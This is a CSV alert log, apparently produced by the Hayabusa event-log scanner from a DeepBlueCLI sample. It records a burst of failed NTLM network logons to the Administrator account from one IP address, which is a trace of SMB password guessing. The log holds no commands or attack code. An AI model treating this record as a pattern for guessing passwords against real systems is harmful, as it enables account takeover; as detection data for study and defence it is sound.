01:50:57.540 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XMZMqCYPHO3n4RIh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:57.584 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I1VUeIuU1rQPISNA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:57.627 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: md4ioB8wNiaz2EKB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:57.664 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nM8QaFeqwDfJZ1gc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:57.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hlR75rMhpLnfQZbC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:57.746 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WF8BcOe4YUDYTXkj | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:57.786 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FK0Iiao20PyPmtTk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:57.832 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kQbCbAHrQilFmMZP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:57.866 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VUdXQOw98VVoksDM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:57.900 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fISqpC8eKlaQGabv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:57.936 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s5Y0VryMAHjtB3n2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:57.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: bsjAHlztFIC8tBt0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:58.012 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CiEQlAlTOhqOKpmy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:58.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i7lUqZMROQXNUtQm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:58.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0eFCGEtOLzjUxI5v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:58.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CqfOAGcVcwSgaeo3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:58.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2hcqVJzkVgvUnebk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:50:58.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q9ZpqiTGXqJlAQTZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:58.255 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qCzXKlJ2vPeqqdfa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:58.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tITW0ihpErFk3nKp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:58.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MdQqr1T4frPNlulf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:58.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: niiXRpP5AVHpG9Hu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:58.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EThR98jZUdwNxbXQ | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:58.465 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NBsJcIw859FfEkLD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:58.502 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kG4Tv5vauSWhbj8F | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:58.543 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 453tjgRGMu46vC33 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:58.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1fnzhhfszxJWxLCT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:58.608 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dWPkeL8TnAbC1nSV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:58.659 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: JrDmUzyK4Xxx6Jn1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:58.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bMTf9D2yjumfS9LM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:58.787 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8cCs65ithseTCORa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:58.823 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QBrGAScjpAdScGmJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:58.864 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n90F99qBpmUUVLId | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:58.912 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MLeOkIG0hVHIOnN7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:50:58.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vVx5uUtkaFIf7PWZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:58.993 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kgd7lCQUQ3dHN18S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:59.032 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b8m2MmpFVK9Uojp7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:59.071 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F0NZjeu3lb5xddVQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:59.112 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YjjXBZnyWt0ljzpv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:59.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sinFBozyUR0sBadM | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:59.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Au22Y0LIuvTmZDpy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:59.220 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QDWW3VfZ7rKayV2v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:59.264 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zPgaFDZtc5wEupnq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:59.363 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TpYZc2TTDfJFnPHo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:59.434 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rYKkl1iHImW9NwKv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:59.489 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: KxA2dh1iUMaMWOkA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:59.542 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sCzEzW8jDZGGZcpd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:59.589 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p8510u5OsCVd94I5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:59.628 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2a0whHngnv7o1Bz2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:59.668 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xy6cGuYgubjlXoMw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:59.708 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: luoXLN2XZQC0lHfu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:50:59.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8jdKLW96haKCHHXI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:59.792 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9SQSH6E1aKXu1o7T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:59.825 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nOUdKa838wK1mLFw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:59.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aFmILxspIJsiEHwL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:59.912 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pCz7qbdSEyqxQSKm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:59.960 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ny3F1xPgakJK0CA7 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:00.001 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Vi7Moaa6d12CzWhl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:00.048 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4fbbRVOig9bn9p5g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:00.079 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qSZrfRe9d0LLkbmA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:00.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QqdZMYsbXFlrKFxk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:00.152 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kypdxj88trEUBEny | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:00.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: 9hM8fge1IrNsJNd2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:00.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SzG27JSj6iAFyiNT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:00.269 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hWcjuW8dU5ATLHzB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:00.304 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ns9lm9Nvhvi4fY6A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:00.353 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aExdYPqY2eUCYZmC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:00.389 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t9cnmRGdByuJlKZj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:51:00.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f9RvWTFFUgCrhlkD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.480 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HC3oQUIEWqztyx6s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TK3BOeD2w9xPB4N1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I6yzU5WuvpmPKLSS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GFoUGsara5Pl03WP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.634 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qLaOCImeMIMlGvMj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.761 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Vzb3pEI2ZeP2NFA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
